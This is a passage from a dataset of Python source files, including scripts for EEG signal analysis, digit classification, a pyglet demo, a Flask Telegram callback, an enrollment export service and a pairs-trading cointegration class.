absolute paths,\n # required by the joint genotype pipeline\n outdir = os.path.abspath(outdir)\n manifest = os.path.join(outdir, \"manifest.tsv\")\n lines_out = []\n with open(manifest) as f:\n for line in f:\n if len(lines_out) == 0:\n lines_out.append(line.rstrip().split(\"\\t\"))\n else:\n fields = line.rstrip().split(\"\\t\")\n for i in [1,2]:\n fields[i] = os.path.join(outdir, fields[i])\n lines_out.append(fields)\n\n with open(manifest, \"w\") as f:\n for t in lines_out:\n print(*t, sep=\"\\t\", file=f)\n\n\nif __name__ == \"__main__\":\n _make_test_data()\n\n","sub_path":"minos/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469265418","text":"import sys\nfrom os import path\nimport collections\nsys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )\nfrom PyQt5 import QtCore,QtWidgets,QtGui\n\n\ndef AdminConfirm(func):\n def wrapper(*args, **kwargs):\n print('admin confirm')\n print(args)\n u = func(*args, **kwargs)\n return u\n return wrapper\n\n\n@AdminConfirm\ndef hello(s = 'hi'):\n print(s)\n\nclass test(QtCore.QObject):\n def __init__(self, parent = None):\n print('init')\n\n @AdminConfirm\n def hello(self):\n print('hello')\n\nTripEntry = collections.namedtuple('TripEntry', 'FileId CarId DriverId ParticipantId FileDatetime FCW Len Labels')\n\n\nclass QtClassMember(QtCore.QObject):\n def __init__(self, li):\n self.li = li\n self.li.append('aaaaaa')\n\n\nif __name__ == '__main__':\n # hello('nihao')\n # obj = test()\n # obj.hello()\n l = [123456, 987, 321, 5678, 'datetime', 'fcw', '5555', 'hello world']\n # trip = TripEntry._make(l)\n\n mem = QtClassMember(l)\n print(mem.li)\n print(l)\n # print(trip)\n ","sub_path":"UI/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433671956","text":"#!/usr/bin/python3\n\n\"\"\"Get the number of syllables of a vowel cluster with context\"\"\"\n\nimport os\nimport json\nimport sys\n\n\nclass DiaeresisFinder(object):\n\n def __init__(self, diaeresis_file=\"../data/diaeresis.json\"):\n self._trie = None\n self._diaeresis_file = diaeresis_file\n try:\n self._load_diaeresis()\n except json.JSONDecodeError:\n pass # cannot read the file, we assume that another file will be loaded later\n\n def _load_diaeresis(self):\n with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), self._diaeresis_file)) as f:\n self._trie = json.load(f)\n\n def do_lookup_sub(self, trie, key):\n if len(key) == 0 or (key[0] not in trie[1].keys()):\n return trie[0]\n return self.do_lookup_sub(trie[1][key[0]], key[1:])\n\n def lookup(self, key):\n return self.do_lookup(key + ['-', '-'])\n\n def wrap_lookup(self, line_read):\n result = self.lookup(line_read)\n print(\"%s: %s\" % (line_read, result))\n\n def do_lookup(self, key):\n return self.do_lookup_sub(self._trie, key)\n\n\ndiaeresis_finder = DiaeresisFinder()\n\n\ndef set_diaeresis(diaeresis_file):\n global diaeresis_finder\n diaeresis_finder = DiaeresisFinder(diaeresis_file=diaeresis_file)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n diaeresis_finder = DiaeresisFinder(sys.argv[1])\n\n if len(sys.argv) > 2:\n for arg in sys.argv[2:]:\n diaeresis_finder.wrap_lookup(arg)\n else:\n while True:\n line = sys.stdin.readline()\n if not line:\n break\n diaeresis_finder.wrap_lookup(line.lower().lstrip().rstrip().split())\n","sub_path":"venv/Lib/site-packages/plint/diaeresis.py","file_name":"diaeresis.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160821743","text":"##\n# This code doesn't work\n##\n\n\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport util as u\n\n# data setting\nrun_date = \"mar18\"\nrun_number = 4\n\ninput_tmp = \"../data/time_cal/time_calibration_{}_run{}.txt\"\n\ninput_file = u.format_string(input_tmp, run_date, run_number)\n\n# read in the data file\nnum_row = 0 \nprint(\"reading \", input_file)\nwith open(input_file, newline='') as handle:\n reader = csv.reader(handle, delimiter=\"=\")\n \n # count the number of low\n for row in reader:\n num_row += 1\n\n handle.seek(0) # rewind the file \n \n data = np.zeros((2, num_row))\n data[0][:] = np.arange(0, num_row, dtype=float)\n\n # store the data\n i = 0\n for row in reader:\n data[1][i] = int(row[0])\n print(i, data[1][i])\n i += 1\n\n","sub_path":"muon-lifetime/scripts/dumb_timecal.py","file_name":"dumb_timecal.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387872234","text":"# Command for jupyter notebook\n# %matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nfrom euclidean_estimator import EuclideanClassifier\n\n# Define file names and image H(eight), W(idth)\ntrain_file_name = os.path.join(os.getcwd(), 'pr_lab1_2016-17_data', 'train.txt')\ntest_file_name = os.path.join(os.getcwd(), 'pr_lab1_2016-17_data', 'test.txt')\nH = 16\nW = 16\noutput = True\n\n\n# Function that reshapes the feature array in order to display \n# the image of a digit\ndef plot_digit(digit, fig_name='Unknown', axes = None):\n # Make digit record into a 16x16 array\n # ravel() used to make the array flat\n im_digit = digit.reshape(H, W)\n\n # Plot the digit\n if axes == None:\n plt.figure('Digit ' + str(fig_name))\n plt.title('Digit ' + str(fig_name))\n plt.imshow(im_digit, cmap='Greys')\n plt.show()\n else:\n axes.set_title('Digit ' + str(fig_name))\n axes.imshow(im_digit, cmap='Greys')\n\n\ndef little_euclidean_classifier(test_digit, feature_means):\n best_label = None\n distance = np.inf\n \n for label in feature_means:\n new_distance = np.linalg.norm(feature_means[int(label)] - test_digit)\n if new_distance < distance:\n best_label = label\n return best_label\n\n\n# Read files\ntrain = pd.read_csv(train_file_name, sep=' ', header=None)\ntest = pd.read_csv(test_file_name, sep=' ', header=None)\n\n# Split labels - features\ntrain_y = train[:, 0]\ntrain_X = train[:, 1:]\ntest_y = test[:, 0]\ntest_X = test[:, 1:]\n\n# Extract digit 131 and plot it\nif output:\n plot_digit(train_X[130, :], train_y[130])\n\n# Get a random sample for each digit and plot them\ndigit_samples = []\nfor label in np.unique(train_y):\n # From the subset of entries with this label, get 1 random sample\n label_X = train_X[train_y == label, :]\n sample_digit = label_X[np.random.randint(0, label_X.shape[0] - 1), :]\n digit_samples += [(label, sample_digit)]\n\nplt.rcParams['figure.figsize'] = [10, 10]\n\nfig, axes = plt.subplots(5,2)\nplt.tight_layout()\naxes_i = 0\naxes_j = -1\n\nfor (label, digit) in digit_samples:\n if(axes_i % 5 == 0):\n axes_j += 1\n axes_i = 0\n if output:\n plot_digit(digit, label, axes[axes_i, axes_j])\n axes_i += 1\n\n# Calculate the mean of all (10,10) pixels for all zeroes\nzeroes = train_X[train_y == 0, :] # Removing the digit label\ntemp = zeroes[:, 10*16 + 9]\nif output:\n print(\"Mean value of pixel 10, 10 for digit 0 =\", np.mean(temp))\n print(\"Variance of pixel 10, 10 for digit 0 =\",np.var(temp))\n \n# Calculate the mean of all pixels for all zeroes\npixel_means = np.mean(zeroes, axis=0)\npixel_vars = np.var(zeroes, axis=0)\n\n# Plot mean 0-digit\nplt.rcParams['figure.figsize'] = [4, 5]\n\nif output:\n plot_digit(pixel_means, fig_name='0 (Mean)')\n plot_digit(pixel_vars, fig_name='0 (Variance)')\n\n\n# Calculate mean and variance for all pixels of all digits\npixel_means = {} #np.empty(len(np.unique(train_y)), dtype=[('label', np.float64), ('means', np.ndarray)])\npixel_vars = {} #np.empty(len(np.unique(train_y)), dtype=[('label', np.float64), ('means', np.ndarray)])\nplt.rcParams['figure.figsize'] = [10, 10]\nfig, axes = plt.subplots(10,2)\nplt.tight_layout()\naxes_i = 0\n\nfor label in np.unique(train_y):\n features = train_X[train_y == label, :]\n # features = features.iloc[:, 1:-1]\n pixel_means[int(label)] = np.mean(features, axis=0)\n pixel_vars[int(label)] = np.var(features, axis=0)\n\n if output:\n plot_digit(pixel_means[int(label)], fig_name=str(label) + ' (Mean)', axes=axes[axes_i, 0])\n plot_digit(pixel_vars[int(label)], fig_name=str(label) + ' (Variance)', axes=axes[axes_i, 1])\n axes_i += 1\n\n# Classify the test digit\nlabel = little_euclidean_classifier(test_digit=test_X[100, :],\n feature_means=pixel_means)\n\nplt.rcParams['figure.figsize'] = [4, 5]\nif output:\n plot_digit(test_X[100, :], fig_name=' labeled ' + str(label) + ' using means, actually is ' + str(test_y[100]))\n\nif output:\n plot_digit(test_X.loc[100, :], fig_name=' labeled ' + str(label) + ' using means, actually is ' + str(test_Y[100]))\n\n# Classify all test digits\nsuccesses = 0\nfor i in range(len(test_y)):\n label = little_euclidean_classifier(test_digit=test_X[i, :],\n feature_means=pixel_means)\n if label == test_y[i]:\n successes += 1\n\nprint('Classification Success Rate: ' + str(successes / len(test_y)))\n\n# Use module estimator implementation\nec = EuclideanClassifier()\nec.fit(train_X, train_y)\npred_Y = ec.predict(test_X)\nscore = ec.score(test_X, test_y)\nprint('Classification Success Rate: ' + str (score))\n\nfrom sklearn.model_selection import cross_val_score, learning_curve\nffcvs = cross_val_score(estimator=ec, X=train_X, y=train_y, cv=5, n_jobs=-1)\nprint('Cross Validation Score: ' + str(np.mean(ffcvs)))\n\ndef plot_learning_curve(train_scores, test_scores, train_sizes, ylim=(0, 1)):\n plt.figure()\n plt.title(\"Learning Curve\")\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n\nsizes, train_scores, test_scores = learning_curve(estimator=ec, X=train_X, y=train_y, train_sizes=np.linspace(.1, 1.0, 10), cv=5, n_jobs=-1)\n\nplot_learning_curve(train_scores, test_scores, sizes, ylim=(.8, 0.9))\n\n# load dataset into Pandas DataFrame\nfrom sklearn.preprocessing import StandardScaler\n# Standardizing the features\nx = StandardScaler().fit_transform(train_X)\n\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=2)\nprincipalComponents = pca.fit_transform(x)\nprincipalDf = pd.DataFrame(data = principalComponents\n , columns = ['principal component 1', 'principal component 2'])\nfinalDf = pd.concat([principalDf, pd.DataFrame(train_y)], axis = 1)\nfig = plt.figure(figsize = (8,8))\nax = fig.add_subplot(1,1,1) \nax.set_xlabel('Principal Component 1', fontsize = 15)\nax.set_ylabel('Principal Component 2', fontsize = 15)\nax.set_title('2 component PCA', fontsize = 20)\n\n\n\ntargets = np.unique(train_y)\ncolors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'tab:brown', 'tab:gray', 'tab:orange']\nfor target, color in zip(targets,colors):\n indicesToKeep = finalDf[0] == target\n ax.scatter(finalDf.loc[indicesToKeep, 'principal component 1']\n , finalDf.loc[indicesToKeep, 'principal component 2']\n , c = color\n , s = 10)\nax.legend(targets)\nax.grid()","sub_path":"lab_1_prep.py","file_name":"lab_1_prep.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223055499","text":"import math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef Gaussian_kernel(sigma):\r\n\r\n #滤波窗口大小 [6*sigma-1]/2*2+1\r\n Kernel_size = math.floor(6*sigma-1)//2*2+1\r\n #生成高斯滤波器的核\r\n half = Kernel_size//2\r\n Kernel = np.zeros((Kernel_size, Kernel_size), dtype = np.float)\r\n for x in range(-half, -half+Kernel_size):\r\n for y in range(-half, -half+Kernel_size):\r\n # 不能是负的索引\r\n Kernel[x+half, y+half] = np.exp(-(x**2+y**2)/(2*(sigma**2)))\r\n Kernel /= (2*np.pi*sigma**2)\r\n Kernel /= Kernel.sum()\r\n return Kernel\r\n\r\n #进行高斯滤波\r\ndef Gaussian_kernel_onedim(sigma):\r\n\r\n #滤波窗口大小 [6*sigma-1]/2*2+1\r\n Kernel_size = math.floor(6*sigma-1)//2*2+1\r\n #生成高斯滤波器的核\r\n half = Kernel_size//2\r\n Kernel = np.zeros((Kernel_size), dtype=np.float)\r\n for x in range(-half, -half+Kernel_size):\r\n # 不能是负的索引\r\n Kernel[x+half] = np.exp(-(x**2)/(2*(sigma**2)))\r\n Kernel /= np.sqrt(2*np.pi)*sigma\r\n Kernel /= Kernel.sum()\r\n # 验证卷积核的正确性\r\n # Kernel = Kernel.reshape(Kernel.shape[0], 1)\r\n # print(np.dot(Kernel, Kernel.T))\r\n return Kernel, Kernel_size\r\n #进行高斯滤波\r\n\r\ndef Guass(sigma,image):\r\n # print(Gaussian_kernel_onedim(sigma))\r\n kernel, kernel_size = Gaussian_kernel_onedim(sigma)\r\n res_img_size_x = image.shape[0]-kernel_size//2*2\r\n res_image = np.zeros((res_img_size_x, image.shape[1], 3), dtype=np.float)\r\n # 先对行进行 一维卷积\r\n for i in range(res_img_size_x):\r\n for j in range(image.shape[1]):\r\n sum = 0\r\n for k in range(kernel_size):\r\n sum = sum+image[i+k][j]*kernel[k]\r\n res_image[i][j] = sum\r\n\r\n #对中间结果的列 进行一维卷积\r\n res_img_size_y = image.shape[1] - kernel_size // 2 * 2\r\n final_res_image = np.zeros((res_img_size_x, res_img_size_y, 3), dtype=np.float)\r\n for j in range(res_img_size_y):\r\n for i in range(res_img_size_x):\r\n sum= 0\r\n for k in range(kernel_size):\r\n sum= sum+res_image[i][j+k]*kernel[k]\r\n final_res_image[i][j] = sum\r\n # 0-1之间显示 故要/255\r\n final_res_image /= 255\r\n plt.subplot(1, 2, 2)\r\n plt.imshow(final_res_image)\r\n plt.show()\r\n\r\nGaussian_kernel(1)\r\nGaussian_kernel_onedim(1)\r\nimage_path1 = './images/pro_2/a.jpg'\r\nimg = plt.imread(image_path1)\r\nplt.subplot(1, 2, 1)\r\nplt.imshow(img)\r\n\r\nGuass(1, img)\r\n\r\n","sub_path":"experiment_2_1.py","file_name":"experiment_2_1.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161837725","text":"import matplotlib.pyplot as plt\nfrom scipy.signal import butter, lfilter\nfrom math import sqrt\nfrom numpy import array, mean, std, fft\n\ndef EEGData2Dict(Path2EEGEFile):\n notanumber=True\n label=''\n value=[]\n with open(Path2EEGEFile) as file:\n while(notanumber): # read until find numbers, previous line - label\n line = file.readline()\n if((line=='\\n') or (line=='')):\n continue\n line=line.split(';')\n while((line[-1][-1] == '\\n') or ((line[-1] == ''))):\n newitem=''\n for i in range(len(line[-1])-1):\n newitem+=line[-1][i]\n del line[-1]\n if(len(newitem)):\n line.append(newitem)\n try:\n for i in range(len(line)):\n line[i] = float(line[i])\n #value.append(line) usually first line is broken and contains 0\n notanumber=False\n except(ValueError):\n label=line\n for i in range(len(label)):\n newitem = ''\n for letter in label[i]:\n if letter==' ':\n continue\n newitem+=letter\n label[i]=newitem\n\n for i in range(10):\n line = file.readline() # very noisy lines\n\n while(len(line)):\n line = file.readline()\n if((line=='\\n') or (line=='')):\n continue\n line=line.split(';')\n while ((line[-1][-1] == '\\n') or ((line[-1] == '')) or (line[-1]=='\\n')):\n newitem = ''\n for i in range(len(line[-1]) - 1):\n newitem += line[-1][i]\n del line[-1]\n if (len(newitem)):\n line.append(newitem)\n for i in range(len(line)):\n line[i]=float(line[i])\n value.append(line)\n\n cvalue=[]\n for i in range(len(value[0])):\n column=[]\n for k in range(len(value)):\n column.append(value[k][i])\n cvalue.append(column)\n\n if(len(label)==len(cvalue)):\n valuedict = {label[i]:cvalue[i] for i in range(len(label))}\n return valuedict\n else:\n print(\"Something goes wrong, check number of labels and number of data columns\")\n exit(33)\n\ndef butter_bandpass_filter(data, lowcut, highcut, fs, order=2):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n\n b, a = butter(order, [low, high], btype='band')\n y = lfilter(b, a, data)\n return y\n\ndef three_sigma_cleaning(eegD,chan):\n m=mean(eegD[chan])\n s=std(eegD[chan])\n hborder=m+3*s\n lborder=m-3*s\n for i in range(len(eegD[chan])):\n if ((eegD[chan][i]>hborder) or (eegD[chan][i]my['IED_TIMESTAMP'][-1]):\n stamps[-1] = my['IED_TIMESTAMP'][-2]\n\nstageTime = [0]\nk = 0\nfor i in range(len(my['IED_TIMESTAMP'])):\n if (my['IED_TIMESTAMP'][i] > stamps[k]):\n stageTime.append(i)\n k += 1\n if (k == len(stamps)):\n break\n\nstagesNames = ['Background', 'First TOVA test', 'Hyperventilation', 'Second TOVA test', 'Aftereffect']\n\nfor key in eegDict:\n for rhythm in eegDict[key]:\n eegDict[key][rhythm]={stagesNames[i]:eegDict[key][rhythm][stageTime[i]:stageTime[i+1]] for i in range(len(stagesNames))}\n\n\ni=0\nfor key in channels:\n for rhythm in eegDict[key]:\n for stage in eegDict[key][rhythm]:\n eegDict[key][rhythm][stage]=round(sum([x**2 for x in abs(fft.fft(eegDict[key][rhythm][stage]))]),3)\n print(int(i/(len(channels)*len(rhythms)*len(stagesNames))*100),'%')\n i+=1\n\neegDict=global_index(eegDict)\n\nfinal=[]\nfor stage in range(len(stagesNames)):\n a = 0\n b = 0\n t = 0\n for channel in eegDict:\n a+=eegDict[channel]['Alpha'][stagesNames[stage]]\n b+=eegDict[channel]['BetaH'][stagesNames[stage]]\n t+=eegDict[channel]['Theta'][stagesNames[stage]]\n final.append([a/t,b/t])\n\n\nwith open(\"E:\\\\test\\\\AlphaTheta.csv\",'a')as file:\n line=''\n for stage in range(len(stagesNames)):\n for i in range(len(final[stage])):\n line+=str(round(final[stage][i],3))+';'\n line=line[:-1]\n line+='\\n'\n file.write(line)","sub_path":"PycharmProjects/MBIC/EEG_Analysis/alfa-teta.py","file_name":"alfa-teta.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539248947","text":"from pyglet.gl import *\nimport pyglet.graphics\nfrom pyglet.window import mouse\nimport random\nfrom math import cos, sin, pi\n\nwindow = pyglet.window.Window(600, 600, caption=\"moving asteroid\")\ncursor = window.get_system_mouse_cursor(window.CURSOR_HAND)\nwindow.set_mouse_cursor(cursor)\n\n\nbatch = pyglet.graphics.Batch()\nvl_asteroid = batch.add(8, pyglet.gl.GL_POLYGON, None,\n ('v2f', (20.0, 0.0, 30.0, 10.0, 40.0, 0.0, 40.0, 20.0, 50.0, 20.0, 40.0, 50.0, 10.0, 40.0, 0.0, 20.0)),\n)\n\n\nx = 300\ny = 300\nvelocity = 90\ntheta = random.random()*2*pi\ndx = velocity*cos(theta)\ndy = velocity*sin(theta)\n\ndef update(dt):\n global x, y, dx, dy\n x = x + dx*dt\n if x > 600:\n x = x - 600\n if x < 0:\n x = 600 + x\n y = y + dy*dt\n if y > 600:\n y = y - 600\n if y < 0:\n y = 600 + y\n \npyglet.clock.schedule_interval(update, 1/60.0) # update at 60Hz\n\n@window.event\ndef on_mouse_press(u, v, button, modifiers):\n global x, y, dx, dy\n if button == mouse.LEFT:\n dx = u - x\n dy = v - y\n\n@window.event\ndef on_draw():\n glClear(GL_COLOR_BUFFER_BIT)\n # Draw outlines only\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n glLoadIdentity()\n glTranslatef(x, y, 0)\n batch.draw()\n\npyglet.app.run()\n","sub_path":"pyglet/opengl_11.py","file_name":"opengl_11.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254660720","text":"\"\"\"\nCopyright (c) [2019] [sixlab.cn]\n[https://github.com/PatrickRoot/six-site] is licensed under the Mulan PSL v1.\nYou can use this software according to the terms and conditions of the Mulan PSL v1.\nYou may obtain a copy of Mulan PSL v1 at:\n http://license.coscl.org.cn/MulanPSL\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR\nPURPOSE.\nSee the Mulan PSL v1 for more details.\n\"\"\"\nimport sys\nimport traceback\n\nfrom flask import Blueprint, request\n\nfrom config.db import select_one\nfrom config.tele import send_msg\n\napp_notify = Blueprint('app_notify', __name__)\n\n\ndef send_my_help(chat_id):\n site_config = select_one('''\n select *\n from site_config\n where config_key = 'mine.help'\n ''', ())\n import json\n print(json.dumps(site_config))\n send_msg(chat_id, site_config['config_val'])\n\n\ndef mine_message(data):\n chat_id = data['message']['chat']['id']\n\n if data['message']['text'] == '/help':\n send_my_help(chat_id=chat_id)\n\n\n\n@app_notify.route(\"/callback\", methods=['POST'])\ndef notify_callback():\n try:\n print(\"-----\")\n data = request.get_json(force=True)\n print(data, file=sys.stdout)\n\n if data['message']['chat']['id'] in (624880292, 463360558):\n mine_message(data)\n\n except Exception as e:\n traceback.print_exc(file=sys.stderr)\n\n return \"ok\"\n\n\ndef sge_au99():\n pass\n","sub_path":"apps/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586285890","text":"#PE12 Highly divisible triangular number\nimport time\n\n\ndef divcount(n):\n result = 1\n for i in range(2, int(n / 2) + 1):\n count = 0\n while n % i == 0:\n n /= i\n count += 1\n result *= (count + 1)\n if n == 1:\n break\n if result == 1:\n return 2\n else:\n return result\n\n\nstart_time = time.time()\ntriangular = 1\ni = 2\n\nwhile divcount(triangular) < 500:\n triangular = triangular + i\n i += 1\nprint(triangular)\nprint(time.time() - start_time, \"seconds\")\n","sub_path":"project_euler_python/PE11-20/PE12.py","file_name":"PE12.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92513792","text":"from flask import abort\nfrom taa.services.cases.case_service import CaseService\n\nfrom taa.services.enrollments.enrollment_application import EnrollmentApplicationService\n\nfrom taa import db, tasks\nfrom taa.core import DBService\nfrom taa.services.data_export import BackgroundExport\n\n\nclass EnrollmentExportService(DBService):\n\n __model__ = BackgroundExport\n\n def export_user_case_enrollments(self, user_href, case_id, format):\n \"\"\"\n Export the enrollments this user is allowed to see, for the given case and format.\n\n Runs in the background, so this returns only the export_id as a reference.\n \"\"\"\n\n # We don't need to store every export ever performed. For now, just store a single export per case/user combo.\n export = db.session.query(BackgroundExport\n ).filter_by(case_id=case_id, user_href=user_href, status=BackgroundExport.STATUS_COMPLETE\n ).first()\n\n export = BackgroundExport(\n params=dict(\n format=format,\n ),\n case_id=case_id,\n user_href=user_href,\n status=BackgroundExport.STATUS_PENDING,\n\n )\n db.session.add(export)\n db.session.commit()\n\n # Queue up the task\n tasks.export_user_case_enrollments.delay(export.id)\n\n return export\n\n def is_export_finished(self, export_id, current_user_href):\n \"\"\"\n Checks to see if an export has finished.\n \"\"\"\n export = self.get_or_404(export_id)\n if export.user_href != current_user_href:\n abort(403)\n\n return export.status == BackgroundExport.STATUS_COMPLETE\n\n def get_export_file(self, export_id, current_user_href):\n \"\"\"\n If an export has finished, retrieve the file for download.\n \"\"\"\n export = self.get_or_404(export_id)\n if export.user_href != current_user_href:\n abort(403)\n\n if export.download_type == BackgroundExport.DOWNLOAD_TYPE_BINARY:\n return export.binary_data\n else:\n return export.unicode_data\n\n\n def process_export(self, export_id):\n export = self.get(export_id)\n\n # Mark as processing\n export.status = BackgroundExport.STATUS_PROCESSING\n db.session.commit()\n\n # Do the export\n case_service = CaseService()\n case = case_service.get(export.case_id)\n\n enrollment_application_service = EnrollmentApplicationService()\n census_records = case_service.get_current_user_census_records(case)\n data = enrollment_application_service.get_enrollment_records_for_census_records(census_records)\n export_data = enrollment_application_service.export_enrollment_data(data)\n\n # Save the results\n export.unicode_data = export_data\n export.download_type = BackgroundExport.DOWNLOAD_TYPE_UNICODE\n export.status = BackgroundExport.STATUS_COMPLETE\n db.session.commit()","sub_path":"taa/services/enrollments/enrollment_export.py","file_name":"enrollment_export.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186775343","text":"from collections import Counter\nclass Solution:\n def frequencySort(self, s: str) -> str:\n dct = Counter(s)\n result = \"\"\n\n for k, v in sorted(dct.items(), key=lambda s: (s[1], s[0]), reverse=True):\n result += k * v\n\n return result\n\ns = Solution()\nprint(s.frequencySort(\"tree\"))","sub_path":"Leetcode/LeetCode Challenges/May LeetCode Challenge/SortCharactersByFrequency.py","file_name":"SortCharactersByFrequency.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422863895","text":"#kuisseuTatchim_edward_final_3.py\r\nimport requests\r\nimport xml.etree.ElementTree\r\nimport time\r\n\r\nf = open(\"kuisseuTatchim_edward_latlon.txt\")\r\nnew = open(\"tatchim_edward_latlon_clean_backup.txt\",\"w\")\r\n\r\nnew_html = open(\"tatchim_edward.html\",\"w\")\r\n\r\nnew_js = open(\"tatchim_edward.js\",\"w\")\r\n\r\nfor i in f.readlines():\r\n\traw = i.split(\":\")\r\n\r\n\tlat_raw = raw[1].split(\",\")\r\n\tlat_pure = lat_raw[0]\r\n\t#print(lat_raw)\r\n\t#print(lat_pure)\r\n\r\n\tlong_raw = raw[2].split(\",\")\r\n\tlong_raw2 = long_raw[0].split(\" \")\r\n\tlong_pure = long_raw2[1]\r\n\r\n\tufo_raw = raw[3].split(\"\\n\")\r\n\tufo_raw2 = ufo_raw[0].split(\" \")\r\n\tufo_pure = ufo_raw2[1]\r\n\tprint(type(ufo_pure))\r\n\r\n\tufo_lines =[lat_pure,long_pure,ufo_pure]\r\n\t#print(ufo_lines)\r\n\tnew.write(ufo_lines)\r\n\t#print(lat_pure)\r\n\t#print(long_pure)\r\n\t#print(ufo_pure)\r\n\r\n\r\n\t#for z in raw:\r\n\t#\tpure = z.split(\",\")\r\n\t#\tprint(pure)\r\n\r\n\t#break\r\n\r\nf.close()\r\nnew.close()\r\nnew_html.close()\r\nnew_js.close()","sub_path":"kuisseuTatchim_edward_final_3_try.py","file_name":"kuisseuTatchim_edward_final_3_try.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425050105","text":"def _update_host_personality(module, array, answer=False):\n 'Change host personality. Only called when supported'\n personality = array.get_host(module.params['host'], personality=True)['personality']\n if ((personality is None) and (module.params['personality'] != 'delete')):\n try:\n array.set_host(module.params['host'], personality=module.params['personality'])\n answer = True\n except Exception:\n module.fail_json(msg='Personality setting failed.')\n if (personality is not None):\n if (module.params['personality'] == 'delete'):\n try:\n array.set_host(module.params['host'], personality='')\n answer = True\n except Exception:\n module.fail_json(msg='Personality deletion failed.')\n elif (personality != module.params['personality']):\n try:\n array.set_host(module.params['host'], personality=module.params['personality'])\n answer = True\n except Exception:\n module.fail_json(msg='Personality change failed.')\n return answer","sub_path":"Data Set/bug-fixing-5/30c9322e99606bb6eb18e950873139758286c0ef-<_update_host_personality>-fix.py","file_name":"30c9322e99606bb6eb18e950873139758286c0ef-<_update_host_personality>-fix.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78449823","text":"import time\nfrom enum import Enum, unique\nfrom typing import Dict, Tuple\n# Helping Thom solving branch\nimport numpy as np\nfrom numpy import array\nfrom pandas import DataFrame\nfrom sklearn.linear_model import LinearRegression\nfrom statsmodels.tsa.api import adfuller\n\nfrom src.DataRepository import DataRepository\nfrom src.DataRepository import Universes\nfrom src.Window import Window\nfrom src.util.Features import Features\nfrom src.util.Tickers import Tickers, SnpTickers\n\n\nclass CointegratedPair:\n\n def __init__(self,\n pair: Tuple[Tickers],\n mu_x_ann: float,\n sigma_x_ann: float,\n scaled_beta: float,\n hl: float,\n ou_mean: float,\n ou_std: float,\n ou_diffusion_v: float,\n recent_dev: float,\n recent_dev_scaled: float):\n\n self.pair: Tuple[Tickers] = pair\n self.mu_x_ann: float = mu_x_ann\n self.sigma_x_ann: float = sigma_x_ann\n self.scaled_beta: float = scaled_beta\n self.hl: float = hl\n self.ou_mean = ou_mean\n self.ou_std = ou_std\n self.ou_diffusion_v = ou_diffusion_v\n self.recent_dev: float = recent_dev\n self.recent_dev_scaled: float = recent_dev_scaled\n\n\n@unique\nclass AdfPrecisions(Enum):\n ONE_PCT = r'1%'\n FIVE_PCT = r'5%'\n TEN_PCT = r'10%'\n\n\nclass Cointegrator:\n\n def __init__(self,\n repository: DataRepository,\n adf_confidence_level: AdfPrecisions,\n max_mean_rev_time: int,\n entry_z: float,\n exit_z: float,\n current_window: Window,\n previous_window: Window):\n\n self.repository: DataRepository = repository\n 